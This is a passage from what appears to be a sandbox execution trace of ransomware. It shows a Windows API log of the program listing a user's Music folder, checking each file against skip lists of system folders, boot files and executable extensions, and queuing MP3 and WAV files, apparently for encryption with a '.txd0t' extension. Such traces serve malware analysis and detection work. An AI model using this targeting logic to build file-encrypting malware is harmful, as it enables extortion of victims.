lpSrch="\\windows\\system32\\") returned 0x0 [0075.435] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\windows\\syswow64\\") returned 0x0 [0075.435] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\windows\\system\\") returned 0x0 [0075.435] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\windows\\winsxs\\") returned 0x0 [0075.436] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\appdata\\roaming\\") returned 0x0 [0075.436] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\appdata\\local\\") returned 0x0 [0075.436] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\appdata\\locallow\\") returned 0x0 [0075.436] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\all users\\microsoft\\") returned 0x0 [0075.436] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="\\inetpub\\logs\\") returned 0x0 [0075.436] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\boot\\") returned 0x0 [0075.436] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\perflogs\\") returned 0x0 [0075.436] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\programdata\\") returned 0x0 [0075.436] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\drivers\\") returned 0x0 [0075.436] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\wsus\\") returned 0x0 [0075.436] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\efstmpwp\\") returned 0x0 [0075.436] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch=":\\$recycle.bin\\") returned 0x0 [0075.436] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="crypt_detect") returned 0x0 [0075.436] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="cryptolocker") returned 0x0 [0075.436] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="ransomware") returned 0x0 [0075.436] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="C:\\WINDOWS") returned 0x0 [0075.436] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="C:\\Program Files (x86)") returned 0x0 [0075.436] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", lpSrch="C:\\Program Files") returned 0x0 [0075.436] GetProcessHeap () returned 0xe30000 [0075.436] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4f8) returned 0xed36d0 [0075.436] StrCpyNW (in: psz1=0xed36d0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1" [0075.436] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", psz2="\\*", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\*") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\*" [0075.436] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\*", lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdece000, ftCreationTime.dwHighDateTime=0x1d5ee36, ftLastAccessTime.dwLowDateTime=0xb74f0970, ftLastAccessTime.dwHighDateTime=0x1d5ed29, ftLastWriteTime.dwLowDateTime=0xb74f0970, ftLastWriteTime.dwHighDateTime=0x1d5ed29, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x770ea4, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec21b0 [0075.436] StrCmpW (psz1=".", psz2=".") returned 0 [0075.436] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdece000, ftCreationTime.dwHighDateTime=0x1d5ee36, ftLastAccessTime.dwLowDateTime=0xb74f0970, ftLastAccessTime.dwHighDateTime=0x1d5ed29, ftLastWriteTime.dwLowDateTime=0xb74f0970, ftLastWriteTime.dwHighDateTime=0x1d5ed29, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x770ea4, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0075.436] StrCmpW (psz1="..", psz2=".") returned 1 [0075.437] StrCmpW (psz1="..", psz2="..") returned 0 [0075.437] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9405f720, ftCreationTime.dwHighDateTime=0x1d5ed16, ftLastAccessTime.dwLowDateTime=0xa95acb70, ftLastAccessTime.dwHighDateTime=0x1d5e882, ftLastWriteTime.dwLowDateTime=0xa95acb70, ftLastWriteTime.dwHighDateTime=0x1d5e882, nFileSizeHigh=0x0, nFileSizeLow=0x13677, dwReserved0=0x770ea4, dwReserved1=0x0, cFileName="HN-OE9UFOJ0.mp3", cAlternateFileName="HN-OE9~1.MP3")) returned 1 [0075.437] StrCmpW (psz1="HN-OE9UFOJ0.mp3", psz2=".") returned 1 [0075.437] StrCmpW (psz1="HN-OE9UFOJ0.mp3", psz2="..") returned 1 [0075.437] StrCpyNW (in: psz1=0xed36d0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1" [0075.437] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", psz2="\\", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\" [0075.437] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\", psz2="HN-OE9UFOJ0.mp3", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3" [0075.437] PathFindExtensionW (pszPath="HN-OE9UFOJ0.mp3") returned=".mp3" [0075.437] StrCmpW (psz1=".mp3", psz2=".txd0t") returned -1 [0075.437] StrCmpIW (psz1="HN-OE9UFOJ0.mp3", psz2="bootsect.bak") returned 1 [0075.437] StrCmpIW (psz1="HN-OE9UFOJ0.mp3", psz2="iconcache.db") returned -1 [0075.437] StrCmpIW (psz1="HN-OE9UFOJ0.mp3", psz2="thumbs.db") returned -1 [0075.437] StrCmpIW (psz1="HN-OE9UFOJ0.mp3", psz2=" ransomware ") returned 1 [0075.437] StrCmpIW (psz1="HN-OE9UFOJ0.mp3", psz2=" ransom ") returned 1 [0075.437] StrCmpIW (psz1="HN-OE9UFOJ0.mp3", psz2="debug.txt") returned 1 [0075.437] StrCmpIW (psz1="HN-OE9UFOJ0.mp3", psz2="boot.ini") returned 1 [0075.437] StrCmpIW (psz1="HN-OE9UFOJ0.mp3", psz2="desktop.ini") returned 1 [0075.437] StrCmpIW (psz1="HN-OE9UFOJ0.mp3", psz2="autorun.inf") returned 1 [0075.437] StrCmpIW (psz1="HN-OE9UFOJ0.mp3", psz2="ntuser.dat") returned -1 [0075.437] StrCmpIW (psz1="HN-OE9UFOJ0.mp3", psz2="ntldr") returned -1 [0075.437] StrCmpIW (psz1="HN-OE9UFOJ0.mp3", psz2="ntdetect.com") returned -1 [0075.437] StrCmpIW (psz1="HN-OE9UFOJ0.mp3", psz2="bootfont.bin") returned 1 [0075.437] StrCmpIW (psz1="HN-OE9UFOJ0.mp3", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.437] PathFindExtensionW (pszPath="HN-OE9UFOJ0.mp3") returned=".mp3" [0075.437] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp3") returned 0x0 [0075.437] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0075.437] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0075.437] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0075.446] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.446] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\HN-OE9UFOJ0.mp3" [0075.447] SetEvent (hEvent=0x408) returned 1 [0075.447] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cbcf510, ftCreationTime.dwHighDateTime=0x1d5f03e, ftLastAccessTime.dwLowDateTime=0x25427f90, ftLastAccessTime.dwHighDateTime=0x1d5e8b4, ftLastWriteTime.dwLowDateTime=0x25427f90, ftLastWriteTime.dwHighDateTime=0x1d5e8b4, nFileSizeHigh=0x0, nFileSizeLow=0x6577, dwReserved0=0x770ea4, dwReserved1=0x0, cFileName="uUCd01DT4yfQz.wav", cAlternateFileName="UUCD01~1.WAV")) returned 1 [0075.447] StrCmpW (psz1="uUCd01DT4yfQz.wav", psz2=".") returned 1 [0075.447] StrCmpW (psz1="uUCd01DT4yfQz.wav", psz2="..") returned 1 [0075.447] StrCpyNW (in: psz1=0xed36d0, psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1" [0075.447] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1", psz2="\\", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\" [0075.447] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\", psz2="uUCd01DT4yfQz.wav", cchMax=1144 | out: psz1="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav") returned="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav" [0075.447] PathFindExtensionW (pszPath="uUCd01DT4yfQz.wav") returned=".wav" [0075.447] StrCmpW (psz1=".wav", psz2=".txd0t") returned 1 [0075.447] StrCmpIW (psz1="uUCd01DT4yfQz.wav", psz2="bootsect.bak") returned 1 [0075.447] StrCmpIW (psz1="uUCd01DT4yfQz.wav", psz2="iconcache.db") returned 1 [0075.447] StrCmpIW (psz1="uUCd01DT4yfQz.wav", psz2="thumbs.db") returned 1 [0075.447] StrCmpIW (psz1="uUCd01DT4yfQz.wav", psz2=" ransomware ") returned 1 [0075.447] StrCmpIW (psz1="uUCd01DT4yfQz.wav", psz2=" ransom ") returned 1 [0075.447] StrCmpIW (psz1="uUCd01DT4yfQz.wav", psz2="debug.txt") returned 1 [0075.447] StrCmpIW (psz1="uUCd01DT4yfQz.wav", psz2="boot.ini") returned 1 [0075.447] StrCmpIW (psz1="uUCd01DT4yfQz.wav", psz2="desktop.ini") returned 1 [0075.447] StrCmpIW (psz1="uUCd01DT4yfQz.wav", psz2="autorun.inf") returned 1 [0075.447] StrCmpIW (psz1="uUCd01DT4yfQz.wav", psz2="ntuser.dat") returned 1 [0075.447] StrCmpIW (psz1="uUCd01DT4yfQz.wav", psz2="ntldr") returned 1 [0075.447] StrCmpIW (psz1="uUCd01DT4yfQz.wav", psz2="ntdetect.com") returned 1 [0075.447] StrCmpIW (psz1="uUCd01DT4yfQz.wav", psz2="bootfont.bin") returned 1 [0075.447] StrCmpIW (psz1="uUCd01DT4yfQz.wav", psz2="!TXDOT_READ_ME!.txt") returned 1 [0075.447] PathFindExtensionW (pszPath="uUCd01DT4yfQz.wav") returned=".wav" [0075.447] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".wav") returned 0x0 [0075.447] FileTimeToSystemTime (in: lpFileTime=0x552eeec, lpSystemTime=0x552eed8 | out: lpSystemTime=0x552eed8) returned 1 [0075.447] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552eed8, lpLocalTime=0x552eea8 | out: lpLocalTime=0x552eea8) returned 1 [0075.447] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x2 [0075.455] StrCpyW (in: psz1=0xeafb88, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0075.455] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\Music\\z37nyAMgu2jp3cfWIU\\toS-EwE0vCCwoskwD1\\uUCd01DT4yfQz.wav" [0075.455] SetEvent (hEvent=0x410) returned 1 [0075.455] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x552eee8 | out: lpFindFileData=0x552eee8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8cbcf510, ftCreationTime.dwHighDateTime=0x1d5f03e, ftLastAccessTime.dwLowDateTime=0x25427f90, ftLastAccessTime.dwHighDateTime=0x1d5e8b4, ftLastWriteTime.dwLowDateTime=0x25427f90, ftLastWriteTime.dwHighDateTime=0x1d5e8b4, nFileSizeHigh=0x0, nFileSizeLow=0x6577, dwReserved0=0x770ea4, dwReserved1=0x0, cFileName="uUCd01DT4yfQz.wav", cAlternateFileName="UUCD01~1.WAV")) returned 0 [0075.455] FindClose (in: hFindFile=0xec21b0 | out: hFindFile=0xec21b0) returned 1 [0075.455] GetProcessHeap () returned 0xe30000 [0075.455] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed36d0 | out: hHeap=0xe30000) returned 1 [0075.455] FindNextFileW (in: hFindFile=0xec2630, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbdece000, ftCreationTime.dwHighDateTime=0x1d5ee36, ftLastAccessTime.dwLowDateTime=0xb74f0970, ftLastAccessTime.dwHighDateTime=0x1d5ed29, ftLastWriteTime.dwLowDateTime=0xb74f0970, ftLastWriteTime.dwHighDateTime=0x1d5ed29, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x660e23, dwReserved1=0x0, cFileName="toS-EwE0vCCwoskwD1", cAlternateFileName="TOS-EW~1")) returned 0 [0075.456] FindClose (in: hFindFile=0xec2630 | out: hFindFile=0xec2630) returned 1 [0075.456] GetProcessHeap () returned 0xe30000 [0075.456] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed31f0 | out: hHeap=0xe30000) returned 1 [0075.456] FindNextFileW (in: hFindFile=0xec25f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7e8eb70, ftCreationTime.dwHighDateTime=0x1d5eef0, ftLastAccessTime.dwLowDateTime=0xd9d07f90, ftLastAccessTime.dwHighDateTime=0x1d5e6a5, ftLastWriteTime.dwLowDateTime=0xd9d07f90, ftLastWriteTime.dwHighDateTime=0x1d5e6a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="z37nyAMgu2jp3cfWIU", cAlternateFileName="Z37NYA~1")) returned 0 [0075.456] FindClose (in: hFindFile=0xec25f0 | out: hFindFile=0xec25f0) returned 1 [0075.456] GetProcessHeap () returned 0xe30000 [0075.456] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed0058 | out: hHeap=0xe30000) returned 1 [0075.456] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0075.456] StrCmpW (psz1="My Documents", psz2=".") returned 1 [0075.456] StrCmpW (psz1="My Documents", psz2="..") returned 1 [0075.456] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x211de47b, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x211de47b, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x211de47b, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0075.456] StrCmpW (psz1="NetHood", psz2=".") returned 1 [0075.456] StrCmpW (psz1="NetHood", psz2="..") returned 1 [0075.456] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x6c4d382c, ftLastAccessTime.dwHighDateTime=0x1d5e877, ftLastWriteTime.dwLowDateTime=0x6c4d382c, ftLastWriteTime.dwHighDateTime=0x1d5e877, nFileSizeHigh=0x0, nFileSizeLow=0x300000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0075.456] StrCmpW (psz1="NTUSER.DAT", psz2=".") returned 1 [0075.456] StrCmpW (psz1="NTUSER.DAT", psz2="..") returned 1 [0075.456] StrCpyNW (in: psz1=0xec7e68, psz2="C:\\Users\\FD1HVy", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy") returned="C:\\Users\\FD1HVy" [0075.456] StrNCatW (in: psz1="C:\\Users\\FD1HVy", psz2="\\", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\") returned="C:\\Users\\FD1HVy\\" [0075.456] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\", psz2="NTUSER.DAT", cchMax=1056 | out: psz1="C:\\Users\\FD1HVy\\NTUSER.DAT") returned="C:\\Users\\FD1HVy\\NTUSER.DAT" [0075.456] PathFindExtensionW (pszPath="NTUSER.DAT") returned=".DAT" [0075.456] StrCmpW (psz1=".DAT", psz2=".txd0t") returned -1 [0075.456] StrCmpIW (psz1="NTUSER.DAT", psz2="bootsect.bak") returned 1 [0075.456] StrCmpIW (psz1="NTUSER.DAT", psz2="iconcache.db") returned 1 [0075.456] StrCmpIW (psz1="NTUSER.DAT", psz2="thumbs.db") returned -1 [0075.456] StrCmpIW (psz1="NTUSER.DAT", psz2=" ransomware ") returned 1 [0075.456] StrCmpIW (psz1="NTUSER.DAT", psz2=" ransom ") returned 1 [0075.456] StrCmpIW (psz1="NTUSER.DAT", psz2="debug.txt") returned 1 [0075.456] StrCmpIW (psz1="NTUSER.DAT", psz2="boot.ini") returned 1 [0075.456] StrCmpIW (psz1="NTUSER.DAT", psz2="desktop.ini") returned 1 [0075.457] StrCmpIW (psz1="NTUSER.DAT", psz2="autorun.inf") returned 1 [0075.457] StrCmpIW (psz1="NTUSER.DAT", psz2="ntuser.dat") returned 0 [0075.457] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x21204700, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x21204700, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x21204700, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0xa9000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0075.457] StrCmpW (psz1="ntuser.dat.LOG1", psz2=".") returned 1 [0075.457] StrCmpW (psz1="ntuser.dat.LOG1", psz2="..") returned 1 [0075.457] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x21204700, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x21204700, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x21204700, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0075.457] StrCmpW (psz1="ntuser.dat.LOG2", psz2=".") returned 1 [0075.457] StrCmpW (psz1="ntuser.dat.LOG2", psz2="..") returned 1 [0075.457] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x21204700, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x21204700, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4edc6408, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0075.457] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", psz2=".") returned 1 [0075.457] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", psz2="..") returned 1 [0075.457] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2122a949, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2122a949, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4edc6408, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0075.457] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", psz2=".") returned 1 [0075.457] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", psz2="..") returned 1 [0075.457] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2122a949, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x2122a949, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x4edc6408, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0075.457] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", psz2=".") returned 1 [0075.457] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", psz2="..") returned 1 [0075.457] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xc1adea7d, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0xc1adea7d, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xc1adea7d, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, 